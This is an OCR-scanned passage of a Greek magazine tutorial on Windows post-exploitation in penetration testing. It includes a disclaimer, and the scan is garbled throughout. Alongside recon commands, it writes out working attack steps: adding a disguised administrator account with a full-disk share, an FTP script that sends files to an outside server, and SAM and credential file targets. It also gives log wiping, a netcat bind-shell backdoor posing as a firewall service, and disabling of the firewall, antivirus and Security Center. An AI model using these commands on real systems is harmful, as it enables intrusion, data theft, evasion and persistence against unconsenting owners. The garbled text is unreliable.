σύστημα ως εφαλτήριο για απόκτηση πρόσβασης σε ἄλλα µηχα- 
νήματα, τα οποία ενδεχομένως εἶναι «βαθύτερα» στην ξένη uno- 
δομή. Τώρα αναζητάμε υπηρεσίες και πόρους (π.χ., κοινόχρηστα 
αποθηκευτικα µέσα) στους οποίους ἐχει πρὀσβαση το εκτεθειμένο 
σύστημα. Ταυτόχρονα ψάχνουμε για αδυναμίες, ἰδιες ἡ παρόμοιες 
µε εκείνες που µας επέτρεψαν να μπούμε στο σύστημα εξαρχἠς. Σε 
αυτή την προσπάθεια χρησιμοποιούμε τεχνικὲς user impersonation 
(pass the hash, password guessing κ.λπ.), MOTE η αναζήτηση των 
πόρων να γίνεται φαινομενικἁ απὀ κάποιον νόμιμο χρήστη. 


ο Cleanup. Υπάρχουν ixvn παντού! ‘Ooo πιο πολύ αλληλεπιδρούμε 
µε Eva σύστημα, τόσο περισσότερα αφήνουμε. Τα ixvn οδηγούν 
τους διαχειριστἐς στην αντιμετώπιση της ευπάθειας που επἑτρε- 
WE την παράνομη εἰσοδο, ενώ μερικὲς φορὲς ξεσκεπάζουν και την 
ταυτότητά µας. Σ’ αυτή τη φάση, λοιπὸν, προσπαθούμε να εξα- 
Φανίσουμε ἡ να καλύψουμε τα ixvn µας µε σιγουριά. Διαγράφου- 
HE ἡ τροποποιούµε κατάλληλα system logs, network connections, 
authentication attempts, events, timestamps και οτιδήποτε µπορεί 
να προδώσει τις ενέργειες ἡ την ταυτὀτητά µας. Απομακρύνουμε 
όλα Ta scripts, Ta binaries και Ta temporary files που µας εἶναι 
πλέον ἄχρηστα. 


ο Persistence. Πολύ συχνὰ, η ευπάθεια που επιτρέπει την πρὀσβα- 
on µας σε Eva σύστημα δεν ἐχει μεγάλο χρόνο ζωής. O σχετικἀ 
γρήγορος εντοπισμός της απὀ το διαχειριστή ἡ µια ενηµέρωση 
του λογισμικού, ενδέχεται να σταθούν αρκετά για να µη μπορὲ- 
coupe να ξαναμπούμε! Π’ auto θα πρέπει να εἶμαστε προνοητικοἰ. 
Θα πρέπει να έχουμε εγκαταστήσει κάποιο backdoor ἡ κάτι ἀλλο, 
το οποίο θα κάνει reverse connection και θα συνδέεται μόνο του 
σε µας. Προφανώς, Ò,TI κι αν KAVOUHE σε AUTÒ το στάδιο πρέπει 
να χρησιμοποιήσουμε µια διαφορετικἠ ευπάθεια ano εκείνη που 
επέτρεψε την αρχικἠ µας εἰσοδο στο σύστημα, ενώ θα πρέπει va 
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παρακάμψουμε Ta ὀποια µέτρα ασφάλειας έχει το απομακρυσμένο 
σύστημα, ὁπως firewalls ἠ/και anti-malware suites. 


Να υπογραμμίσουµε OT! τα παραπάνω στάδια εἶναι στενὰ συνδεδεμένα 
μεταξύ τους και δεν διακρίνονται εὔκολα, OUTE ως προς το χρόνο, οὐτε 
ως προς τον τρόπο εκτέλεσης. Βαδίζουμε πάντα µε γνώμονα το χαμηλὀ- 
τερο δυνατὸ ρίσκο και φροντίζουμε να καλύπτουμε πάντα τα νώτα µας. 
Στη συνέχεια θα μελετήσουμε μερικὲς τεχνικές post-exploitation, τόσο 
σε συστήματα Windows ooo και σε Linux (και *nix γενικότερα). Στο TÈ- 
λος, θα βάλουμε στο παιχνἰδι και µια αυτοματοποιημένη μέθοδο, µε τη 
βοήθεια του meterpreter ano το Metasploit. Πριν ano ὁλα αυτά, όμως, 
σειρὰ ἐχει Eva μικρὸ disclaimer: 


ΟΙ τεχνικές post-exploitation που περιγράφουµε πρέπει να χρησιµο- 
ποιούνται μόνο σε περιπτώσεις penetration testing κι όταν ἔχουμε την 
άδεια του ιδιοκτήτη, του εκάστοτε συστήµατος. Σε κάθε ἄλλη περίπτω- 
ση, το να αποκτήσουμε πρόσβαση σε κάποιο ξένο σύστημα αποτελεί 
παράνομη και επικίνδυνη πράξη, ενώ εἶναι κι ἐνδειξη ανωριµότητας/ 
καγκουριάς! Τέλος, όσα ακολουθούν αποτελούν απλές κατευθυντήριες 
γραμμές και OX! κάποιο εἶδος οδηγού. 


My other computer is *your* Windows box 


Ας υποθέσουμε ὁτι τα έχουμε καταφέρει: To exploitation πέτυχε κι ἐχου- 
με αποκτήσει shell access στο απομακρυσμένο Windows box! Τώρα τι Kå- 
νουµε; Κατ’ αρχάς ψυχραιμία. Apxikd, KGAO εἶναι να δούµε ποιοι εἱμαστε 
και που βρισκόμαστε, ευελπιστώντας για το πολυπόθητο ΝΤ AUTHORITY\ 
System. Στον ακὀλουθο πἰνακα @aivovTdl μερικὲς χρήσιμες εντολὲς και 
η ερμηνεία τους. 


Εντολἠ Επεξήγηση 


| whoami ο Εμφάνιση Tou username και Tou domain 


whoami /all Εμφηνισή ὅλων των πληροφοριών σχετικἁ HE TO 
τρέχον security token 


Πληροφορίες συστήματος (OS, RAM, disk space, 
network cards k.An.) 

Μπορούμε va φιλτράρουμε µε find (n.x., systeminfo | 
find «OS Name:») 


Εμφάνιση environment variables (USERPROFILE, 
HOMEPATH κ.λπ.) 

Μπορούμε va φιλτράρουμε µε find (π.χ. set | find 
USERNAME) 

privileges) 


Τι γίνεται όμως µε τους ἄλλους χρήστες και τα διάφορα groups; Ποιοι 
εἶναι οι administrators του συστήματος και του domain; Δείτε μερικὲς 
σχετικὲς εντολές. 


systeminfo 
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Εντολή Επεξήγηση 


net accounts [/domain] Password policy συστήµατος 
ñ domain 
Εμφάνισ στὠν συστήἠ- 
net user [/domain] H® vl n xen ἠ 
ματος ἡ domain 
Πλ i > A- 
net user username [/domain] npogopieg yia èvav χρὴ 
στη συστήματος ἡ domain 


. F Εμφάνιση admins συστήμα- 

net localgroup administrators [/domain] HPC n . ΠΗ 

τος ἢ domain 

Εμφάνιση των admins του 
in abi τ - 

domain 

Εμφάνιση των ελεγκτών του 
net group "Domain Controllers" /domain HP ` a γ 

domain 

Εμφάνιση των enterprise 
net group "Enterprise Admins" /domain ος n P 


Νομίζουμε ὁτι ἐχετε αρχίσει να pnaiveTe στο κλίμα! Στη συνέχεια παραθέ- 
τουµε μερικὲς EVTOAEG που θα µας δώσουν πληροφορίες για τη δικτύωση 
του συστήματος. 


Εντολή Επεξήγηση 


Εμφάνιση του IP configuration του συστήματος µε 
ipconfig /all μφαν ση 9 ηματος H 
λεπτομέρειες 
ipconfig /displaydns Εμφάνιση των περιεχομένων του DNS cache 


Εμφάνιση όλων των συνδεδεμένων Nodes και των 
listening ports. Anaitei administrator privileges. 
Μπορούμε va φιλτράρουμε τα αποτελέσµατα µε TO 
findstr. Παράδειγμα: 

netstat -na | findstr :445 


Όπως το παραπάνω, μαζὶ µε Ta originating 
netstat -nabo processes kal Ta PIDs. Anaitei administrator 
privileges. 


Εμφάνιση του nivaka της μετάφρασης ano IP σε 
φυσικἠ διεύθυνση 
Εμφάνιση του routing table του συστήματος 


Ας δούμε πὠς μπορούμε να πάρουμε μερικὲς πληροφορίες για τις διεργα- 
σἰες (processes) και τις υπηρεσίες (Services) που τρέχουν στο σύστημα. 


Εντολἠ Επεξήγηση 


ο Εμφάνιση των διεργασιών που τρέχουν και των σχετι- 
tasklist /svc Hp n οἱ πα Ν 
κὠν services 


sc query state= all | Εμφάνιση όλων των εγκατεστηµένων υπηρεσιών 
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Προφανώς μπορούμε να πάρουμε όλες τις παραπάνω πληροφορίες αλλά 
και πάρα πολλὲς ακόµα, µέσω wmic?, Powershell ἡ του registry. Στη φάση 
αυτή όμως, πρέπει να εἰμαστε προσεκτικοί. Δεν θα ἦταν σοφὀ ano μὲ- 
ρους µας να μπλέξουμε µε Ta script execution policies του συστήματος, 
αφού κάτι τέτοιο θα ἑδινε πιθανότατα Eva alert! Πάντως, καλὸ εἶναι va 
EXETE υπόψη σας ορισμένα πράγματα, ακόµα κι αν δεν πρὀκειται να τα 
χρησιμοποιήσετε ἄμεσα: 


Επεξήγηση 


Πληροφορἱες για To bios. Αυτό εἶναι πολύ 
wmic bios list brief / χρήσιμο, για να διαπιστώσουμε αν έχουμε 
format:value συνδεθεί σε πραγματικὀ σύστημα, σε virtual 

machine ἡ kal σε honeypot! 


Δείχνει αν εἶναι ενεργοποιημένο το DEP 
bcdedit | find "nx" (Data Execution Prevention). Απαιτεἰ 
administrator privileges. 


REG QUERY HKEY_LOCAL _ 
MACHINE\Software\ 
Microsoft\Windows\ 
CurrentVersion\Policies\ 
System\ /v EnableLUA 


netsh firewall show Δείχνει αν εἶναι ενεργοποιημένο To Windows 
opmode firewall 


Ατελείωτα κατεβάσµατα 


Δείχνει αν εἶναι ενεργοποιημένο To UAC 
(User Account Control). H τιµή «ΟΧΙ» onuai- 
νει ὁτι εἶναι ενεργοποιημένο To UAC, ενώ η 
«0x0» To αντίθετο. 


Ως εδὠ τα πράγματα ἦταν anà. Τώρα ὁμως τελειώνουν τα αστεία και 
αρχίζει το πλιάτσικο! Οι EvTOAEG που εἰδαμε μέχρι στιγµἠς δεν τροποποι- 
οὖν καθόλου τις ρυθμίσεις του συστήματος. Όπως καταλαβαίνετε αυτὀὸ 
πρέπει να αλλάξει, εφόσον θέλουμε να μεταφέρουμε δεδομένα. Αρχικά 
πρέπει να αποφασἰσουµε ποιες μεθόδους θα χρησιμοποιήσουμε για το 
λεγόμενο data exfiltration. Σε γενικὲς γραμμὲς Eva shared directory ἡ 
ἑνας owned FTP server, apkei! 


Πα va φτιάξουμε στο κατειλημμένο σύστημα Eva shared folder, καλὀ θα 
ἦταν να δημιουργήσουμε Evav χρήστη και μάλιστα µε ὀνομα που δεν 
θα τραβά την προσοχή. Πα παράδειγµα, μπορούμε να δημιουργήσουμε 
το χρήστη IUSR_ASPNET, ο οποίος θα παραπέμπει σε χρήστη του IIS 
(Internet Information Services). Αν έχουμε ἠδη δικαιώματα διαχειριστή, 
μπορούμε να τα δώσουμε και στο VEO χρήστη. Τέλος δημιουργούμε το 
shared directory και δίνουμε πρόσβαση στον νέο χρήστη. Ας δούμε πὠς 
μπορούν να γίνουν ὁλα αυτά: 


net user IUSR_ASPNET nic3P4ssw@Rd /add 
net localgroup administrators IUSR_ASPNET /add 
net share just4me$=C:\ /grant:IUSR_ASPNET, full /unlimited 


Με τα παραπάνω δημιουργήσαμε τον χρήστη IUSR_ASPNET, ο οποίος 
ἐχει δικαιώματα administrator. Στη συνέχεια δημιουργήσαμε To share 
just4me$, το οποίο περιλαμβάνει όλον το δίσκο C:\. Σε αυτόν τον κοινό- 
χρηστο φάκελο ο χρήστης IUSR_ASPNET ἐχει πλήρη δικαιώματα, ενώ ο 


2. Windows management instrumentation command-line 
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ίδιος ο φάκελος εἶναι προσβάσιμος µέσω NETBIOS ως \\host\just4me$. 


H παραπάνω λύση εἶναι εὐκολη και γρήγορη, αλλά δεν εἶναι πολύ αξιό- 
πιστη. Συνήθως προτιμάται η δημιουργἱα ενὸς FTP server, γιατὶ η OXE- 
τικἠ σύνδεση εἶναι πιο εὐκολο (και πιθανό) να περάσει ano Eva χαλαρό 
firewall. <irony> Για ποιο λόγο ἄλλωστε να µπλοκαριστεἰ η επικοινωνἰα 
ενὸς χρήστη προς Eva εξωτερικὀ FTP server; </irony>. Ας δούμε Ta Bn- 
ματα και yl’ αυτἠ τη διαδικασία: 

echo username > ftp.src 

echo password >> ftp.src 

echo bin >> ftp.src 

echo get filel.ext >> ftp.src 

echo put file2.ext >> ftp.src 


echo bye >> ftp.src 


ftp -s:ftp.src FTP_server_IP 
del ftp.src 


Anag και σηκωθεἰ ο ΕΡΤ server, μπορούμε να αρχίσουμε το ανέβασμα 
δεδομένων (την υποκλοπή) ἡ το κατέβασμα εργαλείων που θα διευκολύ- 
νουν τους σκοπούς µας. Στη δεύτερη περίπτωση χρειάζεται προσοχή, για 
να µη θορυβήσουμε το ὁποιο antivirus! Στον ακὀλουθο πίνακα παραθέ- 
τουµε HEPIKG χρήσιμα προγράμματα: 


http://technet.microsoft.com/en-us/ 
sysinternals/bb897553 


PsExec Remote Execute 


Raw TCP/IP Utility 
Token manipulation 


Edit logon 
credentials 
Extract from SAM 
Port redirector 


Ακολουθεἰ µια λίστα µε ενδιαφέροντα αρχεἰα, τα οποία εἶναι χρήσιμα για 
τη μελλοντική µας μελέτη: 


A*AWINDIR%\debug\NetSetup. log 

*AWINDIR%\repair\sam 

*AWINDIR%\repair\system 

*AWINDIR%\repair\software 

*WINDIR%\repair\security 

*WINDIR%\iis6.log (5, 6 or 7) 
*WINDIR%\system32\logfiles\httperr\httperri1.log (IIS 6 error log) 
*SystemDrive%\inetpub\logs\LogFiles (IIS 7's logs location) 
*WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day) 
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%WINDIR%\system32\config\AppEvent. Evt 
%WINDIR%\system32\config\SecEvent.Evt 
%WINDIR%\system32\config\default.sav 
%WINDIR%\system32\config\security.sav 
%WINDIR%\system32\config\software.sav 
%WINDIR%\system32\config\system.sav 
%WINDIR%\system32\CCM\logs\*.log 
%USERPROFILE%\ntuser.dat 
#USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat 
*AWINDIR%\System32\drivers\etc\hosts 
unattend.txt, unattend.xml, sysprep.inf 


Φυσικά, µπορείτε να κατεβάσετε οτιδήποτε GAAO σας ενδιαφἑρει. AMNOTE 
τη φαντασία σας ελεύθερη: Αρχεἰα κειµένου, βάσεις (export ἡ backup), 
temporary files, contacts, Outlook containers (PST και OST), Mozilla 
profiles, password stores, logs, feeds κ.λπ., εἶναι μερικά μόνο ano τα 
apXeid που συγκεντρώνουν ενδιαφέρον. Αν κάποια στιγµἠ θεωρήσετε ὁτι 
τελειώσατε HE το πλιάτσικο, ρἰξτε και NGAI µια ματιά τριγύρω. Ελέγξτε av 
το μηχάνημα συνδέεται σε κἄποιο δίκτυο, αν εἶναι ρυθμισμένο να κρατά 
backups κ.ο.κ. Ακολουθούν μερικὲς χρήσιμες εντολὲς γι’ αυτὀ το στάδιο: 


Εντολἠ (σε μία γραμμή) Επεξήγηση 


Εμφάνιση πληροφοριών για το wireless 
netsh wlan show profiles profile profilename και του κλειδιού 
name=profilename key=clear (WEP/WPA) σε clear text (απαιτεὶ 

admin privileges) 


Εμφάνιση encrypted hash πιθανού VNC 
REG QUERY HKEY_LOCAL _ password. Μπορούμε να To αποκρυ- 
MACHINE \Software\RealVNC\ πτογραφήσουμε εἶτε µε τη βοήθεια kå- 
WinVNC4\ /ν Password ποιων δικτυακών εργαλείων, εἰτε HE TO 

vncdec (http://1v1.name/archives/84/) 


wbadmin /? Διαχείριση windows backups 


Όταν εξαντλήσουμε TO μηχάνημα-θύμα, μπορούμε va στραφούμε και σε 
άλλα συστήματα. Φυσικἀ, σε αυτή την προσπάθεια θα χρησιμοποιήσουμε 
σαν εφαλτήριο το ἠδη κατειλημμένο μηχάνημα. Αυτή η διαδικασία ovo- 
μάζεται pivoting και προὐποθέτει µια καλἠ γνώση του δικτύου στο οποἰο 
ανήκει το compromised σύστημα. Ακολουθούν μερικὲς EVTOAEG που θα 
φανούν χρήσιμες στη συγκέντρωση σχετικὠν πληροφοριών. 


Εντολἠ Επεξήγηση 


z Εμφάνιση των shares του host 
ο κα 
computername 
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Εντολή Επεξήγηση 


net use [driveletter:] \\ Χρησιμοποίηση ενὸς remote share ως 
host\share τοπικὀ drive 


nbtstat -a IP NETBIOS πληροφορίες για To IP 


tasklist /ν /5 i faca 
Απομακρυσμένο task viewing 
computername 


qwinsta / (ἡ query session) Πληροφορίες yia Remote 
SERVER:computername Desktop 

qprocess / (ἡ query process) Processes σε Remote 
SERVER:computername * Desktop 

ΠΕ Απομακρυσμένη εκτέλεση wmic queries 
node:computername... ο n a 


Εξαιρετικὸς σύμμαχος στην απομακρυσμένη εκτέλεση εντολών εἶναι το 
εργαλεἰο PsExec, το onoio αποτελεἰ τµήµα των PsTools. Πρόκειται για Eva 
εργαλείο που αναφέραμε και προηγουμένως (http://technet.microsoft. 
com/en-us/sysinternals/bb897553), το οποίο αναπτύχθηκε αρχικἀ απὀ τον 
Mark Russinovich και πλέον αποτελεί ιδιοκτησἰα της Microsoft. Ρίξτε µια 
ματιὰ στη βοήθεια του προγράµµατος και θα διαπιστώσετε ὁτι NOPE! να 
κάνει θαύματα! Εφόσον ανακαλύψουμε κάτι ἀξιο διερεύνησης, εφαρμὸ- 
ζουμε αναδρομικά τις πρακτικὲς του ψαξίματος και του πλιάτσικου. 


Φύλαγε τα ρούχα σου... 


Κάθε φορά nou ξεμπερδεύουµε µε την αναζήτηση και τα κατεβάσματα 
σε κάποιο μηχάνημα, πρέπει να φροντίζουμε για τη διατήρηση της pu- 
στικὀτητάς µας. Πρέπει va καθαρίζουµε όλα τα ἴχνη που ἄφησε πίσω η 
δράση µας. Εκτὸς ano τη διαγραφἠ των αρχείων και των προγραμμάτων 
που ενδέχεται να ανεβάσαµε στο σύστημα, πρέπει να KATAPYNOOULE και 
όσες επεμβάσεις κάναμε στις ρυθμίσεις του. Σε αυτή την εργασἰα θα µας 
Φανούν χρήσιμες οι ακόλουθες εντολὲς. 


Εντολή Επεξήγηση 


. Unmount του remote share ano 
τοπικὀ drive 
Σταμάτημα και διαγραφἠἡ τοπικού 
net share sharename /delete ia a ΠΗ 


net user username /delete Διαγραφή τοπικού χρήστη 


wevtutil cl logname Εκκαθάριση συγκεκριμένου log 
(logname) 
Διαγραφή όλων των logs ano To C:\ 
ο ο * 
ial μου ii iz i τ É á 


Επίσης, µε λίγο ψάξιμο στο Google μπορούμε va βρούμε κάποιο δωρεάν 
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εργαλειάκι, το οποίο να κάνει μαζικὀ time-stamp editing. Με τη βοήθειἁ 
του θα μπορέσουμε να επαναφέρουµε Ta time-stamps ὁσων αρχείων πει- 
ράξαμε, σε κάποια πρότερη ηµερομηνἰα. 


Ti γίνεται στην περίπτωση που To command execution καταρρεύσει, πριν 
προλάβουμε va ολοκληρώσουμε το penetration testing; Σκεφτείτε OTI 
ακόμα κι va restart του απομακρυσμένου συστήματος θα ἦταν αρκε- 
τὸ για να µας καθυστερήσει υπερβολικἁ πολύ. Για να αποκτήσουμε πάλι 
πρόσβαση στη γραμμή εντολών, θα έπρεπε να εκμεταλλευτούμε ξανά την 
ὁποια αδυναμία εἰχαμε εντοπίσει αρχικἁ. Προφανώς, κάτι τἐτοιο αποτελεί 
σπατάλη δυνάμεων αλλά και χρόνου. Αν έχουμε προνοήσει όμως, pno- 
ρούμε να γλυτώσουμε *kal* τον κόπο *kal* το χρόνο. 


H τοποθέτηση backdoors και η αξιοποἰησήἠ τους κατὰ τη διάρκεια του 
pentesting αποτελούν συνηθισμένες τακτικές, που συνιστούν το λεγὀ- 
µενο persistence. H πρὀσβαση στο σύστημα µε Eva backdoor δίνει στον 
επιτιθέµενο αρκετά πλεονεκτήματα. Πέρα ano το κέρδος σε χρόνο και 
ευκολία, η σύνδεση θα εἶναι πλήρως ελεγχόμενη και πιθανώς κρυπτο- 
γραφημένη, ώστε να µην εκτίθεται καθόλου ο επιτιθέμενος. Δυστυχώς, 
στις μέρες µας τα πράγματα εἶναι πολύ δύσκολα. Τα συστήματα ασφἀ- 
λειας ενὸς λειτουργικού εἶναι πολλαπλά, ενὠ μόλις καταρρέει! το Eva £l- 
δοποιεἰται το επὀµενο! ‘Eva backdoor καλεῖται να υπερκεράσει µια σειρἆ 
ano antivirus, firewalls, security centers, το UAC, το DEP, τα sandboxes 
κ.ο.κ. ΟΙ μόνες (σχετικἀ) αξιόπιστες λύσεις εἶναι Ta custom malware, Ta 
οποία ἐχουν χαμηλὸ detection rate, ὁπως επἰσης και Ta rootkits. Οι και- 
poi που αρκούσε η απενεργοποἰηση μερικών υπηρεσιών (Security Center, 
antivirus κ.ἀ.) ¿xouv περάσει aveniotpenti. Παρ’ όλα αυτά, υπάρχουν pE- 
ρικὲς TEXVIKEG που εφαρμόζονται µε επιτυχία μέχρι σήμερα. Ας δούμε τι 
μπορούμε να κάνουμε. 


Αρχικἁ, πρέπει να ελέγξουμε αν υπάρχει κἄποια ανενεργἡ υπηρεσία VNC. 
Αν τη βρούμε την ενεργοποιούµε και φροντίζουμε να ξεκινά αυτόματα, 
σε κάθε επανεκκίνηση του συστήματος. Πα το σκοπὀ αυτό θα µας χρεια- 
στούν οι ακόλουθες EVTOAEG: 


Εντολἠ Επεξήγηση 


Ἐλεγχος για κἄποια ξεχασμένη εγκατά- 
σταση του VNC 


sc query WinVNC4 


Θέτουμε την υπηρεσία να ξεκινά µε κάθε 


sc config WinVNC4 start= auto i 
εκκίνηση 


Αν η έρευνα για το VNC δεν οδηγἠσει πουθενὰ, καταφεύγουμε στα 
Remote Desktop Services. Κατά τα γνωστά, αν οι OXETIKEG υπηρεσίες 
εἶναι GNEVEPYONOINHEVEG, τις ενεργοποιούμε: 
Εντολἠ (σε μία γραμμή) Επεξήγηση 
REG QUERY HKEY_LOCAL_MACHINE\ Ἐλεγχος για το αν επιτρέπονται 


SYSTEM\CurrentControlSet\ οι συνδέσεις Remote Desktop ἡ 
Control\Terminal Server \/v ox! (‘1x0’ = δεν επιτρέπονται, 
fDenyTSConnections ‘0x0’ = επιτρέπονται) 
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Microsoft Windows [Version 6.1.7601] 
Copyright <c? 2669 Microsoft Corporation. All rights reserved. 


HC:\Windows\system32>cd \PsTools 
C=\P8Tools>psexec 27 


PsExec v1.98 - Execute processes remotely 
Copyright (0) 2661-26016 Mark Russinovich 
Sysinternals — www.sysinternals.com 


JPsExec executes a program on a remote system, where remotely executed console 
applications execute interactively. 


Usage: psexec [\\computer[.computer2[....] | @filelJ][-u user [-p psswd][-n 51][-} 
1[-s i-e ][-x][-i [session]][-c [-fi-v]][-w directory][-d][-<priority>][-a π,π,... 
1 cmd [arguments] 

is | Separate processors on which the application can run with 
commas where 1 is the lowest numbered CPU. For example. 
to run the application on CPU 2 and CPU 4, enter: 
eae beer ens 
Copy the specified program to the remote system for 
execution. If you omit this option the application 
must be in the system path on the remote system. 

Don’t wait for process to terminate (non—interactive>. 

Does not load the specified account’s profile. 

Copy the specified program even if the file already 

exists on the remote system. 

Run the program so that it interacts with the desktop of 
specified session on the remote system. If no session is 
specified the process runs in the console session. 

If the target system is Vista or higher. has the process 

run with the account’s elevated token, if available. 

Run process as limited user (strips the Administrators group 
and allows only privileges assigned to the Users group>. 

On Windows Vista the process runs with Low Integrity. 
Specifies timeout in seconds connecting to remote computers. 
Specifies optional password for user name. If you omit this 
you will be prompted to enter a hidden password. 

Run the remote process in the System account. 

Specifies optional user name for login to remote 

computer. 

Copy the specified file only if it has a higher version number 
or is newer on than the one on the remote system. 

Set the working directory of the process relative to 

remote computer>. 

Display the UI on the Winlogon secure desktop (local system 
only>. 

-priority Specifies -]ων, —helownormal, -abovenormal, -high or 
-realtime to run the process at a different priority. Use 
-background to run at low memory and [/0 priority on Vista. 

computer Direct PsExec to run the application on the remote 
computer or computers specified. If you omit the computer 
name PsExec runs the application on the local system, 
and if you specify a wildcard (55), PsExec runs the 
command on all computers in the current domain. 

ΒΕ116 PsExec will execute the command on each of the computers listed 
in the file. 

program Name of application to execute. 

arguments Arguments to pass “note that file paths must be 
absolute paths on the target system). 


You can enclose applications that have spaces in their name with 
quotation marks e.g. psexec \\marklap “c:\long name app.exe". 
Input is only passed to the remote system when you press the enter 
key. and typing Ctrl-C terminates the remote process. 


If you omit a user name the process will run in the context of your 
account on the remote system, but will not have access to network 
resources Checause it is impersonating>. Specify a valid user name 
in the Domain\User syntax if the remote process requires access 

to network resources or to run in a different account. Note that 
the password is transmitted in clear text to the remote system. 


Error codes returned by PsExec are specific to the applications you 
execute, not PsExec. 


C=\PSTools> 


Μεταξύ ἀλλων, το PSExec μπορεί να εκτελέσει προγράµµατα απομακρυσμένα, HE 
διάφορες μεθόδους και µε Ta Credentials οποιουδήποτε χρήστη! 
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Εντολἠ (σε µία γραμμή) Επεξήγηση 


REG ADD HKEY_LOCAL_MACHINE\ 
SYSTEM\CurrentControlSet\ 
Control\Terminal Server \/v 
fDenyTSConnections /t REG_DWORD 
/d O /f 


Evepyonoinon Remote Desktop 
Services 


Εναλλακτικά, θα μπορούσαμε va ανεβάσουµε στο μηχάνημα το netcat 
και στη συνέχεια να το ενεργοποιήσουµε σαν υπηρεσία. Παρακάτω dei- 
XVOUHE NOG μπορεὶ να γίνει κάτι TETOIO. Παρατηρεἰστε OT! φροντίζουμε να 
ορίσουμε κι απὀ µια κατάλληλη περιγραφή (description) για τις σχετικὲς 
διεργασίες, ὥστε µε µια γρήγορη ματιά να μοιάζουν αθώες: 

sc create backdoor binpath= "cmd /ς C:\nc.exe -dLp 6666 -e cmd. 


exe" type= own type= interact start= auto DisplayName= "XP 
Firewall Service" 


sc start backdoor 


sc failure backdoor reset= 86400 actions= restart/1/restart/10/ 
run/3@@0@ command= "cmd /C C:\nc.exe -dLp 6666 -e cmd.exe" 


sc description backdoor "XP advanced firewall service" 


Av όλα τα παραπάνω σας φαίνονται περίπλοκα ἡ δεν έχετε ὀρεξη να μπλὲ- 
ξετε µε υπηρεσίες, μπορούμε πολύ πιο απλά να Φτιάξουμε Eva shortcut 
που θα ξεκινά το netcat µε τις κατάλληλες παραμέτρους. Στη συνέχεια, 
μπορούμε να βάλουμε το συγκεκριµένο shortcut σε κάποιον ano τους 
ειδικούς καταλόγους του συστήµατος, οι οποίοι συμμετέχουν στους un- 
Χανισμοὺς αυτόματης εκκίνησης (autostart). Στα Windows Vista, 7, 2008 
Kal 2008R2, ἑνας τέτοιος κατάλογος εἶναι αυτός: 


*SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\ 
Startup\ 


Στα Windows ΧΡ και 2003, ο αντίστοιχος κατάλογος εἶναι αυτός: 


*SystemDrive%\Documents And Settings\All Users\Start Menu\ 
Programs\StartUp\ 


Στην περίπτωση που επιλἐξουµε To autostart, πρέπει va anevepyonoin- 
σουµε To firewall ἡ να προσθέσουμε το κατάλληλο exception: 


netsh firewall set opmode=disable 


netsh firewall add portopening protocol=TCP port=6666 
name=backdoor mode=enable scope=all 


Επίσης, καλὀ θα ἦταν va απεγκαταστἠσουµετο antivirus, αφού προηγου- 
μένως μάθουμε το ὀνομά του: 


wmic product get name /value 
wmic product where name="XXX" call uninstall /nointeractive 


Όλα αυτά όμως θα ἑκαναν To Security Center va διαµαρτυρηθεῖ! Enot- 
νως, θα βοηθούσε να το απενεργοποιήσουμε: 


sc config wscsvc start=disabled 
sc stop wscsvc 


Καταλαβαίνετε πως δεν υπάρχει nayia τακτική για την τοποθέτηση 
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backdoor. Ανάλογα µε το περιβάλλον στο οποίο έχουμε βρεθεἰ και το 
πόσο εὐκολα μπορούμε να ξεγελάσουμε ἡ να παρακάμψουμε τα συστή- 
ματα ασφάλειας, πρέπει να λάβουμε τα απαραίτητα µέτρα. Με λίγα λόγια, 
πρέπει κάθε φορά να αυτοσχεδιάζουμε! Διαφορετικά, μπορεἰ να βρεθού- 
HE εκτὸς συστήματος µε το πρώτο update ἡ reboot. 


Θα ἦταν μεγάλο λάθος αν πιστεύαµε ὁτι οι παραπάνω τεχνικὲς μπορούν 
να εφαρμοστούν αυτούσιες σε οποιοδήποτε περιβάλλον Windows. Πέρα 
ano το γεγονός πως η σύνταξη των εντολών” µπορεί να διαφἑρει ano 
ἐκδοση σε ἐκδοση των Windows, υπάρχουν και ἄλλοι λόγοι για τους 
οποίους ενδέχεται να αποτύχει η εκτέλεση µιας εντολἠς. Κατ’ αρχάς, 
πολλές φορὲς υπάρχουν group policies που απαγορεύουν την εκτέλεση 
ορισμένων εντολών and τους απλούς χρήστες. Άλλες πάλι φορὲς μπορεί 
να µην έχουμε τα απαιτούμενα permissions (administrator ἡ elevated 
permissions). Τέλος, πολλὲς φορὲς οι υπηρεσίες των στόχων εἶναι σχεδι- 
ασμένες να αποτυγχάνουν (βλέπε honeypots). 


(Πιο) σοβαρὰ τώρα... 


Εἶναι λογικὀ να αναρωτηθεἰτε αν εἶναι δυνατόν να θυμάται κανεὶς τόσες 
πολλὲς EVTOAEG, για τη γραμμὴ εντολὠν. Ἄλλοι πάλι θα αναρωτιούνται 
αν θα ἦταν δυνατὸν να συγκεντρωθούν οι παραπάνω εντολὲς σε scripts 
(batch files), ὥστε να εκτελούνται οι επιθέσεις αυτόματα. H απάντηση 
και στα δύο ερωτήματα εἶναι καταφατικἠ: Εἶναι εξίσου δυνατὰ και Ta δύο! 


Να πούμε εδὠ ὁτι η συγκέντρωση των EVTOAMV και των παραπάνω τεχνι- 
KOV ἐγινε µε αρκετἠ έρευνα στο διαδίκτυο και δεν αποτελεἰ προϊόν ευφυ- 
jac, οὐτε αστείρευτης γνώσης που κουβαλάει στη μνήμη του ο γράφων 
(δεν θα μπορούσε ἄλλωστε). Βασιστήκαμε σε αναλύσεις ἐμπειρων pen 
testers και προσπαθήσαμε να δώσουμε µια γενικἠ εικὀνα, χωρἰς να Ep- 
βαθύνουμε σε συγκεκριμἐνες/μεμονωμένες περιπτώσεις. H εμπειρία (και 
τα help files :Ρ) βοηθά στο να εφαρµόζεις κάθε φορά τη σωστὴ εντολή 
ἡ τεχνική, σύμφωνα µε το στὀχο σου. ANO την ἄλλη, οι EVTOAEG θα pno- 
ρούσαν να οργανωθούν σε ομάδες και να συγκροτήσουν batch files. Πα 
παράδειγμα, φανταστείτε Eva script που θα ¿kave "αναγνώριση στόχου”, 
κάποιο ἆλλο το οποίο θα αντέγραφε κρίσιμα αρχεία, Eva τρίτο το οποίο θα 
ἐψαχνε για ἄλλα μηχανήματα ἡ υπηρεσίες του δικτύου και πάει λέγοντας! 
Βέβαια, το να βρούμε και να χρησιμοποιούμε έτοιμα script δεν ἐχει τίποτα 
να µας προσφέρει. Δεν πρὀκειται να μάθουμε τίποτα καινούργιο χρησιμο- 
ποιώντας τα script που ἐγραψε κάποιος ἄλλος, ενώ τα “παιχνίδια” µετά 
